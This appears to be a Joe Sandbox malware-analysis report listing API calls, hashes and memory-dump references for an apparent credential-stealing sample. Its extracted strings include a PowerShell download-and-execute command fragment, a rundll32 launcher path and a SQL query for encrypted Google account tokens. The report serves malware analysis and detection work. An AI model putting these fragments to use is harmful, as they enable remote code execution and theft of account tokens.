                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8a38e99a1c91602e99152ae0c55544bbf28e9d29fc696bda232c8a71813086a8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 26F05E75B40304BFFB106B90EC0FFAA7B7CEB44B45F150065F701A9090E6B0AE409720
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00089BB2
                                                                                                                                                                                                                                                      • Part of subcall function 00091E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00096931,?), ref: 00091E37
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,AccountId), ref: 00089BCF
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00089C7E
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00089C99
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF
                                                                                                                                                                                                                                                      • Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpylstrlen$lstrcat$AllocLocal
                                                                                                                                                                                                                                                    • String ID: AccountId$GoogleAccounts$GoogleAccounts$SELECT service, encrypted_token FROM token_service
                                                                                                                                                                                                                                                    • API String ID: 3306365304-1713091031
                                                                                                                                                                                                                                                    • Opcode ID: 615ff5e74c3494a61ba069fc71d44a81ad605f2c5b87e57a131e0e000b9a522f
                                                                                                                                                                                                                                                    • Instruction ID: eb0fa390bac1ec540c1299cd7abafc3420528d234759d8248520097287e9a5a9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 615ff5e74c3494a61ba069fc71d44a81ad605f2c5b87e57a131e0e000b9a522f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D681E332900119EFCF01FBA4ED469EEB7B5FF14305F510061F990BB162DB21AE5A9BA1
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650
                                                                                                                                                                                                                                                      • Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD
                                                                                                                                                                                                                                                      • Part of subcall function 00091C4A: GetSystemTime.KERNEL32(?,000B6701,?), ref: 00091C79
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF
                                                                                                                                                                                                                                                    • ShellExecuteEx.SHELL32(?), ref: 00092EC0
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • C:\ProgramData\, xrefs: 00092DA3
                                                                                                                                                                                                                                                    • .ps1, xrefs: 00092DF3
                                                                                                                                                                                                                                                    • ')", xrefs: 00092E13
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00092E5B
                                                                                                                                                                                                                                                    • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00092E18
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                                                                                                                                                                                                                    • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$.ps1$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    • API String ID: 2215929589-1989157005
                                                                                                                                                                                                                                                    • Opcode ID: 882bf6df716a2ccd98070f4d7fd31b9c01310fe9472866f90abe2e01b3f1cb5c
                                                                                                                                                                                                                                                    • Instruction ID: e8d5b4538160169d21ffffecb1a05dca8bd9a3bc295bedc344e5c96f351d8843
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 882bf6df716a2ccd98070f4d7fd31b9c01310fe9472866f90abe2e01b3f1cb5c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B541B232E40129ABCF11FBA4DC429CDB7B4FF04700F5141A6FAA4B7112DB30AE4A9B90
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Name::operator+$NameName::
                                                                                                                                                                                                                                                    • String ID: throw(
                                                                                                                                                                                                                                                    • API String ID: 168861036-3159766648
                                                                                                                                                                                                                                                    • Opcode ID: e78e6b111a783753adc6c8c8cfe9013bb90b9dc5cc6107fe9bd85a7592b51b7c
                                                                                                                                                                                                                                                    • Instruction ID: 01d4b6466474fade8255f0178aa7b29c66950f0258c4a17c61b62f5d6b8ebd71
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e78e6b111a783753adc6c8c8cfe9013bb90b9dc5cc6107fe9bd85a7592b51b7c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F01927060020AAFCF14EBA4D852EFD7BB5EF44748F04406AF905DB2A6DB70EA45DB80
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: strtok_s
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3330995566-0
                                                                                                                                                                                                                                                    • Opcode ID: 42b20951345bbe5fd40c717cefe256bf97dbd9ca2a9237ebc250c3c9446fc1bb
                                                                                                                                                                                                                                                    • Instruction ID: 28c66f9b6faf548849565c8a6a64e15bc71682c269006d21fb3ed27e6d769a48
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 42b20951345bbe5fd40c717cefe256bf97dbd9ca2a9237ebc250c3c9446fc1bb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 063193B1E45105AFCF649F68DC86BA97BE8FF18709F519059E805DB192EB34CB40AF40
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 000956A4
                                                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,00000000,00020119,?,?,00000000,?), ref: 000956C4
                                                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF), ref: 000956EA
                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 000956F6
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 00095725
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?), ref: 00095738
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$CloseOpenQueryValue_memset
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3891774339-0
                                                                                                                                                                                                                                                    • Opcode ID: 4a3ac807300b3da5d200ced3b6883e705e4f850395028de153b36bd0cc9f087e
                                                                                                                                                                                                                                                    • Instruction ID: 8e75fe307b5c828e0bb82439f275557619e858aefbb1b7fe2cb3568672a870f6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4a3ac807300b3da5d200ced3b6883e705e4f850395028de153b36bd0cc9f087e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E5418C7198001D9FCF55BB20EC8AEE877B9BF18305F4004A6B519A7162EE709EC69F90
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650
                                                                                                                                                                                                                                                      • Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD
                                                                                                                                                                                                                                                      • Part of subcall function 00091C4A: GetSystemTime.KERNEL32(?,000B6701,?), ref: 00091C79
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF
                                                                                                                                                                                                                                                    • ShellExecuteEx.SHELL32(?), ref: 00092B84
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                                                                                                                                                                                                                    • String ID: "" $.dll$C:\ProgramData\$C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                    • API String ID: 2215929589-2108736111
                                                                                                                                                                                                                                                    • Opcode ID: dc40db06c02cda619585ab94268668ebcd1aee345e20f739e97a48d117b6c7d9
                                                                                                                                                                                                                                                    • Instruction ID: 071eb3481bd08138e4a0de9e58260fece028d231d2fdc5c28922c526a9b59f0c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc40db06c02cda619585ab94268668ebcd1aee345e20f739e97a48d117b6c7d9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB718F32D10119ABCF11FFA5D842ADEB7B4BF04700F514161FAA0B7162DB70AE4A9B90
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 00088307
                                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,-0000001F,00000000,?,?), ref: 0008833C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
